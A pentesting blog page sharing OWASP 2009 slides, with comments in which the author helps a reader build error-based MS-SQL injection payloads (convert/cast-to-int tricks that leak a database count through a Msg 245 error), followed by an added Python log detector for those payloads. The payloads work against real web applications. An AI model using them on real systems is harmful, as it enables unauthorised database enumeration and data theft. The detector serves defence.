www.notsosecure.com

From Pentesters To Pentesters

Here are my slides from OWASP AU 2009.

Send Comments/feedbacks at sid–at–notsosecure.com

6 Comments

  1. Hey Sumsid!

    Thanks for those slides :)

  2. Marezzi
    8:38 pm on April 4th, 2009

    nice slides :) I have 1 question: how can I count how many databases there are via SQL injection in MS-SQL? I want to apply this query: Select count(CATALOG_NAME) from INFORMATION_SCHEMA.SCHEMATA, or Select count(name) from master.dbo.sysdatabases
    Thanks

  3. sid
    8:53 pm on April 4th, 2009

    I think you are after this:

    Select count(distinct name) from master.dbo.sysdatabases

    or you can do select db_name(n)

    and enumerate n till you get null.

    Hope it helps... :)

  4. Marezzi
    10:43 pm on April 5th, 2009

    Thanks for the info but it's not working. I know about db_name(n) but I need this: asp?pid=12 or 1=convert(int,(Select count(distinct name) from master.dbo.sysdatabases))--
    I don't see an error. Also tried asp?pid=12 or 1=convert(int,(Select count(distinct catalog_name) from information_schema.schemata))-- with no success.
    Don't know what to do

  5. sid
    9:45 am on April 6th, 2009

    That's because the query returns an integer, and type conversion from int to int is valid, hence no errors.

    I will look for some more type conversions to get this returned as error message.

    You can still use a blind (boolean) injection query to get this value, but I think I know what you are after... :)

  6. sid
    10:13 am on April 6th, 2009

    select cast('total database:'+cast(count(name) as nvarchar) as int) from master.dbo.sysdatabases

    Msg 245, Level 16, State 1, Line 1
    Conversion failed when converting the nvarchar value 'total database:6' to data type int.
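The thread above shows the two artefacts that error-based extraction leaves behind: a request carrying a cast/convert-to-int wrapper around a subquery against the catalog views, and an application-side Msg 245 conversion error that echoes the extracted value. The following detector, an added example that is not part of the original post or its comments, scans constructed access-log and application-log lines (the sample lines, field layout and signature patterns are my own assumptions) and reports both kinds of evidence, so an operations team can alert on the attempt and on the leak.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log lines (not from the page): one request carrying the
# convert(int, (subquery)) pattern from the thread, one benign request, and one
# application log line with the MS-SQL Msg 245 error that leaks the value.
SAMPLE_LOGS = [
    '10.0.0.5 - - [06/Apr/2009:10:13:00 +1000] "GET /item.asp?pid=12%20or%201%3D'
    'convert(int%2C(select%20count(name)%20from%20master.dbo.sysdatabases))-- HTTP/1.1" 500 512',
    '10.0.0.7 - - [06/Apr/2009:10:14:02 +1000] "GET /item.asp?pid=12 HTTP/1.1" 200 2048',
    "2009-04-06 10:13:01 app[web1] Msg 245, Level 16, State 1, Line 1 "
    "Conversion failed when converting the nvarchar value 'total database:6' to data type int.",
]

# Request-side signature: CONVERT(int, ...) or CAST(... AS int) around
# injected SQL, or a reference to the catalog views used to count databases.
REQUEST_PATTERN = re.compile(
    r"convert\s*\(\s*int\s*,"
    r"|cast\s*\(.*?\bas\s+int\b"
    r"|\bmaster\.dbo\.sysdatabases\b"
    r"|\binformation_schema\.schemata\b",
    re.IGNORECASE | re.DOTALL,
)

# Application-side signature: the Msg 245 text, capturing the leaked value.
ERROR_PATTERN = re.compile(
    r"Msg 245\b.*?Conversion failed when converting the \w+ value '(.*?)' to data type",
    re.IGNORECASE | re.DOTALL,
)


def scan_line(line):
    """Return (kind, detail) for a suspicious line, or None if it looks benign."""
    decoded = unquote_plus(line)  # URL-decode so %28/%2C etc. cannot hide the pattern
    err = ERROR_PATTERN.search(decoded)
    if err:
        return ("leaked_conversion_error", err.group(1))
    req = REQUEST_PATTERN.search(decoded)
    if req:
        return ("error_based_sqli_attempt", req.group(0))
    return None


def scan(lines):
    """Return a list of (line_index, kind, detail) findings for the given log lines."""
    findings = []
    for idx, line in enumerate(lines):
        hit = scan_line(line)
        if hit:
            findings.append((idx, hit[0], hit[1]))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOGS):
        print(finding)
```

The leaked value in the Msg 245 line is the same data the attacker reads, so that finding should be treated as confirmed disclosure, not merely an attempt; the request-side match is the earlier, cheaper signal.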